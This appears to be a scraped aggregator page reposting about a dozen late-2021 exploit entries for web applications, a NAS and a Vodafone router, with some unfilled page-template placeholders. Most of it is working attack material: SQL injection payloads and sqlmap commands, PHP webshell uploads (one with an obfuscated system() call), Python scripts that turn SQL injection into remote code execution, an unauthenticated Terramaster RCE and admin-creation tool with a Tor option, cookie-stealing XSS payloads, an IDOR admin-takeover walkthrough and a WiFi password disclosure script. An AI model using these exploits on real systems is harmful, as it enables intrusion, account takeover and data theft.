# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path # Discovery by: Yehia Elghaly # Date: 30-12-2021 # Vendor Homepage: https://www.trigonesoft.com/ # Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe # Tested Version: 3.61 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 x86 - Windows Server 2016 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ TRIGONE Remote System Monitor Server RemoteSystemMonitorService C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe Auto C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RemoteSystemMonitorService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv er\RemoteSystemMonitorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TRIGONE Remote System Monitor Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem
HireHackking

Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection

HACKER · %s · %s

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection # Google Dork: Powered by Virtual Airlines Manager [v2.6.2] # Date: 2021-12-30 # Exploit Author: Milad Karimi # Vendor Homepage: http://virtualairlinesmanager.net # Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ # Version: 2.6.2 # Tested on: Ubuntu 19.04 [1] Vulnerable GET parameter: notam_id=[SQLi] [PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi] [2] Vulnerable GET parameter: airport=[SQLi] [PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] [3] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [4] Vulnerable GET parameter: plane_location=[SQLi] [PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] [5] Vulnerable GET parameter: hub_id=[SQLi] [PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] [6] Vulnerable GET parameter: pilot_id=[SQLi] [PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] [7] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [8] Vulnerable GET parameter: event_id=[SQLi] [PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] [9] Vulnerable GET parameter: tour_id=[SQLi] [PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
HireHackking

openSIS Student Information System 8.0 - 'multiple' SQL Injection

HACKER · %s · %s

# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection # Date: 26/12/2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://opensis.com # Software Link: https://opensis.com # Version: 8.0 Community Edition # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com ''' DESCRIPTION A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php. The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php. Example: POST /TransferredOutModal.php?modfunc=detail Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 if an attacker exploits this vulnerability, attacker may access private data in the database system. EXPLOITATION POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: localhost User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: cookie Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 69 student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs Example Payloads: Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools '''
HireHackking

RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 25/07/2021 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://ritecms.com/ # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: <= 3.1.0 # Tested on: Windows 10, Ubuntu 18, XAMPP # Google Dork: intext:"Powered by RiteCMS" # Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ # Description # ################ # RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. # There are 4 ways of bypassing the current file upload protection to achieve remote code execution. # Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved # Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved # Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php # Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved $ cat .htaccess <Files *.php> deny from all </Files> <Files ~ "webshell\.php$"> Allow from all </Files> ################################### # PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1. Login as admin 2. Go to Files Manager 3. Choose a directory to upload .php file either media or files directory. 4. Then, click Upload file > Browse.. 3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: ======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($_GET[base64_decode('Y21k')]);?> -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file_name" -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_mode" 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize" 150 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_compression" 70 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_file_submit" OK - Upload file -----------------------------410923806710384479662671954309-- #################### # Webshell access: # #################### # Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id # Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """
HireHackking

WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection

HACKER · %s · %s

# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection # Date 22/12/2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.plugins-market.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip # Version: <= 4.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24750 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md ''' Description: The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks ''' # Banner: banner = ''' ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___ / __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \ ( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) ) \___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/ [+] WP Visitor Statistics SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import requests from datetime import datetime # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) my_parser.add_argument('-C', '--COMMAND', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD command = args.COMMAND print('') print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('') # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Exploit: exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}' exploit = session.get(exploit_url) print(exploit.text) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking

Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

HACKER · %s · %s

# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Ubuntu # This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads. import requests import random import string from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>" let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) resp = requests.get(url) htmlParser = BeautifulSoup(resp.text, 'html.parser') getMenu = htmlParser.findAll("a", {"class": "nav-link"}) selectPage = "" for i in getMenu: if "movie" in i.text.lower(): selectPage = i["href"] break selectPage = selectPage.replace("./","") findSql = url + selectPage resp = requests.get(findSql) htmlParser = BeautifulSoup(resp.text, 'html.parser') movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"}) sqlPage = movieList[0]["href"] sqlPage = sqlPage.replace("./","") sqlPage = url + sqlPage print("\nFinding path") findPath = requests.get(sqlPage + '\'') findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")] findPath = findPath[findPath.index("<b>")+3:len(findPath)] print("injection page: "+sqlPage) parser = findPath.split('\\') parser.pop() findPath = "" for find in parser: findPath += find + "/" print("\nFound Path : " + findPath) SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php") SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) print("\n\nShell Uploading...") status = requests.get(sqlPage+SQLtoRCE) shellOutput = requests.get(url+shellname+".php?tago=whoami") print("\n\nShell Output : "+shellOutput.text) print("\nShell Path : " + url+shellname+".php")
HireHackking
# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) # Google Dork: NA # Date: 03-OCT-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php # Software Link: https://www.yahoobaba.net/project/library-system-in-php # Version: V 1.0 # Tested on: WAMPP # Description # Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation. # Proof of Concept (PoC) : #Exploit: 1) Goto: http://localhost/library-system/dashboard.php 2) Login as admin using test credentials: admin/admin 3) Goto: http://localhost/library-system/update-publisher.php?pid=12 4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script> 5) Click on Save 6) Our payload is fired and stored
HireHackking

SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) # Date: 28/12/2021 # Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc) # Vendor Homepage: https://www.safarimontage.com/ # Version: 8.3 and 8.5 # Tested on: Ubuntu Linux [Firefox] # CVE: CVE-2021-45425 # Proof of Concept: GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1 Host: vulnIP Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=SSSION; lang=en Connection: close
HireHackking

Hostel Management System 2.1 - Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS) # Date: 26/12/2021 # Exploit Author: Chinmay Vishwas Divekar # Vendor Homepage: https://phpgurukul.com/hostel-management-system/ # Software Link: https://phpgurukul.com/hostel-management-system/ # Version: V 2.1 # Tested on: PopOS_20.10 *Steps to reproduce* 1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php 2) Enter xss payload <img src=x onerror=alert(String.fromCharCode(88,83,83));> on various input fields. 3) Server Accepted our Payload in input fileds. Affected input fields: Correspondence Address, Guardian Relation, Permanent Address
HireHackking
# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4 *SQL Injection* SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list. *Attack Vector* An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap. *Steps to reproduce:* Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL: http://localhost/hprms/admin/?page=patients/view_patient&id=1 Step-2: Put the SQL Injection payloads in 'id' field. time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
HireHackking
# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4 *Insecure direct object references (IDOR)* Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system. *Attack Vector* An attacker can takeover the Administrator's account *Steps of reproduce:* Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'. ===================================================================================================================================== Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account' http://localhost/hprms/admin/?page=user ===================================================================================================================================== Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite: POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 4 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== Step-3: Change parameter id '4' to id '1' POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.
HireHackking
# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) # Date: 12/24/2021 # Exploit Author: n0tme (thatsn0tmysite) # Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ # Vendor Homepage: https://www.terra-master.com/ # Version: TOS 4.2.X (4.2.15-2107141517) # Tested on: 4.2.15, 4.2.10 #/bin/env python import urllib3 import requests import json import argparse import hashlib import time import os TARGET = None MAC_ADDRESS = None PWD = None TIMESTAMP = None def tos_encrypt_str(toencrypt): key = MAC_ADDRESS[6:] return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest() def user_session(session, username): session.cookies.clear() cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)} if username == "guest": cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")} for name,value in cookies.items(): session.cookies[name] = value def download(session, path, save_as=None): user_session(session, "guest") r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path}) filename = os.path.basename(path) if save_as is not None: filename = save_as with open(filename, "wb") as file: file.write(r.content) def get_admin_users(session): download(session, "/etc/group", save_as="/tmp/terramaster_group") with open("/tmp/terramaster_group", "r") as groups: for line in groups: line = line.strip() fields = line.split(':') if fields[0] == "admin": users = fields[3].split(",") os.remove("/tmp/terramaster_group") return users if __name__ == '__main__': p = argparse.ArgumentParser() p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)") p.add_argument("--cmd", dest="cmd", help="Command to run", default="id") p.add_argument("-d", "--download", dest="download", help="Only download file", default=None) p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None) p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None) p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR") p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)") args = p.parse_args() urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET = args.target s = requests.Session() if args.tor: s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"} s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"}) r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS") try: j = r.json() PWD = j["data"]["PWD"] MAC_ADDRESS = j["data"]["ADDR"] except KeyError: exit(1) TIMESTAMP = str(int(time.time())) s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP}) s.headers.update({"authorization": PWD}) if args.download != None: download(s, args.download, save_as=args.save_as) exit(0) #RCEs RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23", f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND for admin in get_admin_users(s): user_session(s, admin) if args.create != None: user, password = args.create.split(":") groups = json.dumps(["allusers", "admin"]) r=s.post(f"{TARGET}/module/api.php?mobile/__construct") r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""}) if "create user successful!" in str(r.content, "utf8"): print(r.content) break continue r = s.get(RCEs[args.rce]) content = str(r.content, "utf-8") if "<!--user login-->" not in content: print(content) exit(0)
HireHackking

Vodafone H-500-s 3.5.10 - WiFi Password Disclosure

HACKER · %s · %s

# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure # Date: 01/01/2022 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.vodafone.es/ # Software Link: N/A # Version: Firmware version Vodafone-H-500-s-v3.5.10 # Hardware model: Sercomm VFH500 # The WiFi access point password gets disclosed just by performing a GET request with certain headers import requests import sys import json if len(sys.argv) != 2: print("Usage: python3 vodafone-pass-disclose.py http://IP") sys.exit() url = sys.argv[1]+"/data/activation.json" cookies = {"pageid": "129"} headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} req=requests.get(url, headers=headers, cookies=cookies) result=json.loads(req.text)[3].get("wifi_password") print("[+] The wifi password is: "+result)